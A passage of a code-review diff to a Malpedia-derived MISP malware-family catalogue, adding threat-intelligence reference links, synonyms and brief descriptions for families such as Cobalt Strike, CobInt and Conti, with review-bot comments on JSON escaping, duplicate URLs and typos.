"https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], 
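Review bot: The new Clop description appears to break across two physical lines after `included into the ransom notes. `, whereas the ClipBanker entry in the same hunk escapes its line break as `\r\n`; if that break is really present in the file rather than an artefact of how this page is rendered, the string contains a raw newline, which RFC 8259 does not allow inside a string and which strict parsers reject. The text should carry `\r\n` (or a plain space) as ClipBanker's does, and the cluster's JSON validation should be run on the regenerated file before merging so a malformed description cannot land. Because the descriptions are pulled from Malpedia, the escaping belongs in the import step rather than in a hand edit that the next sync would overwrite.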
@@ -5911,21 +11496,185 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.brighttalk.com/webcast/7451/462719", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", - "https://blog.cobaltstrike.com/", - "https://www.cobaltstrike.com/support", - "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://community.riskiq.com/article/0bcefe76", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py", + "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", + "https://www.secureworks.com/research/threat-profiles/bronze-president", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", + "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + 
"https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", + "https://isc.sans.edu/diary/26752", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", "https://401trg.com/burning-umbrella/ ", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", + "https://github.com/sophos-cybersecurity/solarwinds-threathunt", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", + "https://asec.ahnlab.com/ko/19860/", + "https://www.youtube.com/watch?v=gfYswA_Ronw", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf", + 
"https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", + "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", + "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://malwarelab.eu/posts/fin6-cobalt-strike/", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", + "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", + 
"https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", + "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", + "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", + "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", + "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://isc.sans.edu/diary/rss/26862", + "https://isc.sans.edu/diary/rss/27176", "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", + "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", + 
"https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", + "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", + "https://community.riskiq.com/article/f0320980", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", + "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://github.com/Apr4h/CobaltStrikeScan", + "https://twitter.com/VK_Intel/status/1294320579311435776", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", + "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", + 
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", + "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", + "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", + "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", + "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", + "https://www.cobaltstrike.com/support", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", - "http://cyberforensicator.com/2018/12/23/dissecting-cozy-bears-malicious-lnk-file/" + "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", + "https://blog.cobaltstrike.com/", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", + 
"https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", + "https://www.macnica.net/file/mpression_automobile.pdf", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", + "https://mez0.cc/posts/cobaltstrike-powershell-exec/", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", + "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://twitter.com/swisscom_csirt/status/1354052879158571008", + 
"https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", + "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://connormcgarr.github.io/thread-hijacking/", + "https://paper.seebug.org/1301/", + "https://web.br.de/interaktiv/ocean-lotus/en/", + "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", + "https://redcanary.com/blog/getsystem-offsec/", + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", + "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://asec.ahnlab.com/ko/19640/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + 
"https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", + "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html" + ], + "synonyms": [ + "Agentemis", + "BEACON", + "CobaltStrike" ], - "synonyms": [], "type": [] }, "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", 
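Review bot: The new Cobalt Strike refs array lists the same Secureworks profile twice, as `"http://www.secureworks.com/research/threat-profiles/gold-kingswood"` and `"https://www.secureworks.com/research/threat-profiles/gold-kingswood"`, differing only in scheme; only the https form should be kept. The CobInt hunk below adds the identical pair. A normalisation pass in the import step — lowercasing scheme and host, preferring https, stripping surrounding whitespace and de-duplicating — would catch both occurrences, and would also fix the context entry `"https://401trg.com/burning-umbrella/ "` whose trailing space sits inside the string (that line predates this commit, though).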
@@ -5946,13 +11695,19 @@
 "value": "Cobian RAT"
 },
 {
- "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager.",
+ "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager. It's CRM mailslot module was also observed being downloaded by ISFB.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint",
+ "https://www.group-ib.com/blog/renaissance",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint",
+ "https://www.netscout.com/blog/asert/double-infection-double-fun",
 "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
- "https://www.group-ib.com/blog/renaissance"
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood"
 ],
 "synonyms": [
 "COOLPANTS"
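Review bot: The sentence appended to the CobInt description carries a grammatical error — `It's CRM mailslot module was also observed being downloaded by ISFB.` should read `Its CRM mailslot module was also observed being downloaded by ISFB.`. Since the description is taken from Malpedia, the correction belongs upstream; a local edit would be reverted by the next sync.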
@@ -5967,11 +11722,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra",
- "https://github.com/hfiref0x/TDL",
- "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
 "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
+ "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://github.com/hfiref0x/TDL",
+ "https://www.circl.lu/pub/tr-25/",
 "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
- "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon",
+ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf"
 ],
 "synonyms": [
 "Carbon"
@@ -6021,12 +11783,13 @@
 "value": "Cohhoc"
 },
 {
- "description": "",
+ "description": "Coinminer is an unwanted malicious software which uses the victim's computational power (CPU and RAM mostly) to mine for coins (for example Monero or Zcash). The malware achieves persistence by adding one of the opensource miners on startup without the victim's consensus. Most sophisticated coin miners use timer settings or cap the CPU usage in order to remain stealthy.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer",
 "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/",
- "https://secrary.com/ReversingMalware/CoinMiner/"
+ "https://secrary.com/ReversingMalware/CoinMiner/",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/"
 ],
 "synonyms": [],
 "type": []
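Review bot: The new Coinminer description says the miner is installed `without the victim's consensus`, where `consent` is meant. Because the text is pulled verbatim from the Malpedia export, the wording should be corrected upstream so the next sync does not reintroduce it.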
@@ -6034,6 +11797,51 @@
 "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db",
 "value": "Coinminer"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock",
+ "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "140f271b-0be1-4455-96c6-015632ade33a",
+ "value": "ColdLock"
+ },
+ {
+ "description": "Cold$eal is a packer for encrypting (sealing) malware. It contains some AV-evasion techniques as well as some sandbox-detection. It was developed by $@dok (aka Sadok aka Coldseal).\r\nIt was available as a cryptor service under the url coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom made cryptostub including a FuD garantee backed by free update to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource. The encryption key itself was stored inside the resource as well. Upon start the cryptostub would extract the key, decrypt the payload and perform a selfinjection using the now decrypted payload.\r\nNote: The packed sample provided contains some harmless payload, while the unpacked sample is the bare cryptostub without a payload.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal",
+ "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html",
+ "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
+ "https://www.youtube.com/watch?v=242Tn0IL2jE",
+ "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/",
+ "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html"
+ ],
+ "synonyms": [
+ "ColdSeal"
+ ],
+ "type": []
+ },
+ "uuid": "8d5b7766-673c-493f-b760-65afd61689cb",
+ "value": "Cold$eal"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba",
+ "https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5c0f96fd-54c0-44cd-9caf-b986e3fa2879",
+ "value": "CollectorGoomba"
+ },
 {
 "description": "",
 "meta": {
@@ -6078,6 +11886,36 @@
 "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e",
 "value": "Combos"
 },
+ {
+ "description": "This malware was found in a backdoored Visual Studio project that was used to target security researchers.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker",
+ "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/",
+ "https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/",
+ "https://www.anquanke.com/post/id/230161",
+ "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/",
+ "https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "44240b4b-09d3-4b6b-a077-bce00c35ea38",
+ "value": "ComeBacker"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comfoo",
+ "https://www.secureworks.com/research/secrets-of-the-comfoo-masters"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f5044eda-3119-4fcf-b8af-9b56ab66b9be",
+ "value": "Comfoo"
+ },
 {
 "description": "",
 "meta": {
@@ -6091,15 +11929,33 @@
 "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da",
 "value": "ComodoSec"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun",
+ "https://securelist.com/compfun-successor-reductor/93633/",
+ "https://securelist.com/compfun-http-status-based-trojan/96874/",
+ "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ ],
+ "synonyms": [
+ "Reductor RAT"
+ ],
+ "type": []
+ },
+ "uuid": "541d5642-0648-4b5a-97b9-81110f273771",
+ "value": "COMpfun"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace",
 "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
 "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html",
- "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/",
- "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research"
+ "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/"
 ],
 "synonyms": [
 "lojack"
@@ -6141,12 +11997,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker",
- "https://www.honeynet.org/files/KYE-Conficker.pdf",
+ "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
 "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
 "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
- "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
 "https://github.com/tillmannw/cnfckr",
- "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf",
 "http://contagiodump.blogspot.com/2009/05/win32conficker.html"
 ],
 "synonyms": [
@@ -6165,6 +12019,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius",
 "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
+ "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
 "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/"
 ],
 "synonyms": [],
@@ -6177,12 +12032,51 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee",
- "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti",
+ "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/",
+ "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/",
+ "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://github.com/cdong1012/ContiUnpacker",
+ "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
+ "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware"
 ],
 "synonyms": [],
 "type": []
 },
+ "uuid": "c9dca6f3-2a84-4abe-8f33-ccb7a7a0246c",
+ "value": "Conti Ransomware"
+ },
+ {
